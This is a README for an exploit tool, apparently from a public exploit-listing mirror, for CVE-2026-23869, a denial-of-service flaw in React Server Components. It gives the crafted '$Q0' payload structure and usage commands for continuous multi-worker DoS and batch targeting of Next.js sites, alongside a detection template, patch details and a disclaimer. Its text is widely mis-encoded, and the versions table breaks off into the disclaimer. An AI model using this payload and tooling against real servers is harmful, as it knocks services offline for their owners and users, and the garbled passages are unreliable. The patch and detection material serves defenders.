Share
## https://sploitus.com/exploit?id=DECB45B5-1A4E-5D23-BA1B-91B8017D7984
โšก CVE-2026-23869 โ€” React2DoS


  Unauthenticated Remote Denial-of-Service via React Flight Protocol
  Quadratic CPU Exhaustion in Server Components Map Deserialization



  Overview โ€ข
  How It Works โ€ข
  Tools โ€ข
  Install โ€ข
  Usage โ€ข
  Nuclei โ€ข
  Fix โ€ข
  Disclaimer


---

## Vulnerability Overview

| Field | Detail |
|-------|--------|
| **CVE ID** | CVE-2026-23869 |
| **Alias** | React2DoS |
| **CVSS Score** | 7.5 (High) |
| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` |
| **CWE** | CWE-400 (Uncontrolled Resource Consumption) |
| **Type** | Unauthenticated Remote Denial of Service |
| **Discovered By** | Yohann Sillam (Imperva Threat Research) |
| **Affected** | `react-server-dom-webpack` / `parcel` / `turbopack` โ‰ค 19.2.4 |
| **Patched** | React 19.2.5+ / Next.js 15.5.15+ / 16.2.3+ |

A critical Denial-of-Service vulnerability exists in React Server Components' **Flight protocol** deserialization. An unauthenticated attacker can send a single crafted HTTP request to any Next.js App Router **Server Action** endpoint, causing **quadratic O(nยฒ) CPU exhaustion** that locks the server for minutes.

### References

- [Vercel Official Advisory](https://vercel.com/changelog/summary-of-cve-2026-23869)
- [Imperva Technical Analysis โ€” "React2DoS"](https://www.imperva.com/blog/react2dos-cve-2026-23869-when-the-flight-protocol-crashes-at-takeoff/)
- [React Patch PR #36236](https://github.com/facebook/react/pull/36236)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2026-23869)

---

## How It Works

### The Bug: Missing `consumed` Flag in Map Deserialization

React Flight protocol uses special markers to serialize data types. `$Q` represents a **Map** object. When the server receives a payload containing self-referencing `$Q0` markers:

```
Payload: [ [1,1], [1,1], ...(n valid entries)..., "$Q0", "$Q0", ...(n refs)... ]
```

**Each `$Q0`** triggers a `new Map()` constructor that iterates over **all n valid entries**. The Map constructor throws an error (because the entries are malformed), but the critical bug is: **the `consumed` flag is never set on failure**.

This means the **next `$Q0`** recomputes the exact same Map from scratch โ†’ creating **O(nยฒ)** complexity:

```
n valid entries ร— n $Q0 references = nยฒ Map constructor calls

Example: 65,000 ร— 65,000 = 4,225,000,000 operations
Result:  Single request locks CPU for 5-10+ minutes
```

### Attack Flow

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”     POST / (multipart/form-data)      โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ Attacker โ”‚ โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ–ถ โ”‚  Next.js Server  โ”‚
โ”‚          โ”‚     Header: Next-Action:    โ”‚                  โ”‚
โ”‚          โ”‚     Body: [[1,1]...,"$Q0","$Q0"...]    โ”‚  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ CPU  โ”‚
โ”‚          โ”‚                                        โ”‚  100% LOCKED     โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜                                        โ”‚  for ~5-10 min   โ”‚
                                                    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

### Vulnerable Code (Before Fix)

```javascript
// ReactFlightReplyServer.js โ€” BEFORE patch
case "Q": {
  const data = getOutlinedModel(response, id, obj);
  return new Map(data);  // โ† Fails but doesn't set consumed = true
                         //   Next $Q0 recomputes from scratch
}
```

### Patched Code (After Fix)

```javascript
// ReactFlightReplyServer.js โ€” AFTER patch (React 19.2.5+)
case "Q": {
  const data = getOutlinedModel(response, id, obj);
  obj.consumed = true;   // โ† Fix: set flag BEFORE construction
  return new Map(data);  //   Prevents repeated recomputation
}
```

---

## Tools Included

| File | Description |
|------|-------------|
| `poc.py` | Full-auto exploit tool with 4-phase pipeline (Recon โ†’ Extract โ†’ Detect โ†’ Exploit) |
| `CVE-2026-23869.yaml` | Nuclei detection template with flow-based orchestration |
| `scan.sh` | Wrapper script: httpx live filtering + nuclei scanning |
| `extract-action-ids.sh` | Standalone Server Action ID extractor |

---

## Installation

```bash
# Clone the repository
git clone https://github.com/cybertechajju/CVE-2026-23869-Expolit.git
cd CVE-2026-23869-Expolit

# Install Python dependency
pip install requests

# Make scripts executable
chmod +x poc.py scan.sh extract-action-ids.sh
```

### Optional Dependencies

```bash
# For Nuclei template scanning
go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# For live target filtering
go install github.com/projectdiscovery/httpx/cmd/httpx@latest
```

---

## Usage

### ๐Ÿ”ฅ Full Auto Scan (Single Target)

Just give the URL โ€” the tool does everything automatically:

```bash
python3 poc.py -u https://target.com
```

**What happens:**
1. **Phase 1 โ€” Recon:** Fingerprints Next.js (headers, HTML markers, build ID)
2. **Phase 2 โ€” Extract:** Finds Server Action IDs from JS bundles
3. **Phase 3 โ€” Detect:** Safe timing-based vulnerability check (500-entry probe)
4. **Phase 4 โ€” Report:** Shows vulnerability verdict with timing analysis

### ๐Ÿ“‹ Batch Scan (Multiple Targets)

```bash
# Scan a list of domains/IPs
python3 poc.py -L targets.txt

# With JSON report output
python3 poc.py -L targets.txt -o results.json
```

### ๐ŸŽฏ Manual Mode (Known Action ID)

```bash
# Safe detection only
python3 poc.py -u https://target.com -a  --detect

# Single-shot exploit
python3 poc.py -u https://target.com -a  --single

# Continuous DoS (10 workers)
python3 poc.py -u https://target.com -a  --exploit -w 10
```

### ๐Ÿ” Extract Action IDs Only

```bash
python3 poc.py -u https://target.com --extract
```

### โš™๏ธ All Options

```
Options:
  -u, --url URL          Target URL (single target)
  -L, --list FILE        File with target URLs/IPs (one per line)
  -a, --action-id ID     Server Action ID (skip auto-extraction)
  --detect               Detection only โ€” safe, non-destructive (default)
  --single               Single-shot exploit after detection
  --exploit              Continuous DoS after detection
  --extract              Only extract action IDs
  -l, --length N         Payload entries (default: 130000)
  -w, --workers N        Concurrent workers (default: 5)
  -d, --delay SEC        Delay between requests (default: 1.0)
  -o, --output FILE      Save JSON report
  -t, --threads N        Concurrent targets for list scan (default: 3)
```

### Backward Compatibility

The original PoC syntax still works:

```bash
python3 poc.py  
```

---

## Nuclei Template

### Quick Scan

```bash
# Single target
nuclei -t ./CVE-2026-23869.yaml -u https://target.com -itags dos

# Multiple targets
nuclei -t ./CVE-2026-23869.yaml -l targets.txt -itags dos

# Clean output (only vulnerable results)
nuclei -t ./CVE-2026-23869.yaml -l targets.txt -itags dos -silent
```

> **Note:** The `-itags dos` flag is **required** because Nuclei excludes DoS templates by default for safety.

### Template Detection Flow

```
Request 1 (GET /)     โ†’  Fingerprint Next.js (headers + HTML markers)
Request 2 (GET /)     โ†’  Extract Server Action IDs from createServerReference()  
Request 3 (POST /)    โ†’  Baseline timing request (benign payload)
Request 4 (POST /)    โ†’  Exploit probe (250 valid + 250 $Q0 entries)
                         โ””โ”€ If response time โ‰ฅ 3s โ†’ VULNERABLE
```

### Auto Scanner Script

```bash
# Runs httpx โ†’ filters live targets โ†’ nuclei scan โ†’ results
./scan.sh

# Or specify custom files
./scan.sh targets1.txt targets2.txt
```

---

## Detection Logic

The tool uses **timing-based detection** to safely identify vulnerable servers:

| Metric | Vulnerable | Patched |
|--------|-----------|---------|
| Baseline (benign request) | ~0.1-0.5s | ~0.1-0.5s |
| Probe (500 entries) | **3-10+ seconds** | ~0.1-0.5s |
| Ratio (Probe/Baseline) | **>5x** | ~1x |
| Full payload (130K entries) | **5-10+ minutes** | ~0.1-0.5s |

A detection is confirmed when:
- Probe response time **โ‰ฅ 3 seconds**, OR
- Probe/Baseline ratio **> 5x** with probe time **> 1 second**

---

## Affected Versions

| Package | Vulnerable | Fixed |
|---------|-----------|-------|
| `react-server-dom-webpack` | โ‰ค 19.2.4 | 19.2.5+ |
| `react-server-dom-parcel` | โ‰ค 19.2.4 | 19.2.5+ |
| `react-server-dom-turbopack` | โ‰ค 19.2.4 | 19.2.5+ |
| Next.js |  **โš ๏ธ FOR AUTHORIZED SECURITY TESTING ONLY**
>
> This tool is provided for **educational purposes** and **authorized penetration testing** only. Unauthorized use of this tool against targets you do not own or have explicit permission to test is **illegal** and may violate computer fraud laws (CFAA, CMA, etc.).
>
> The authors are not responsible for any misuse or damage caused by this tool. Always obtain proper written authorization before testing any systems.

---

## Credits

- **Vulnerability Research:** [Yohann Sillam](https://www.imperva.com/blog/react2dos-cve-2026-23869-when-the-flight-protocol-crashes-at-takeoff/) โ€” Imperva Threat Research
- **PoC Development:** [cybertechajju](https://github.com/cybertechajju)
- **React Patch:** [Facebook/Meta React Team](https://github.com/facebook/react/pull/36236)

---


  
  
  



  If you find this useful, consider giving it a โญ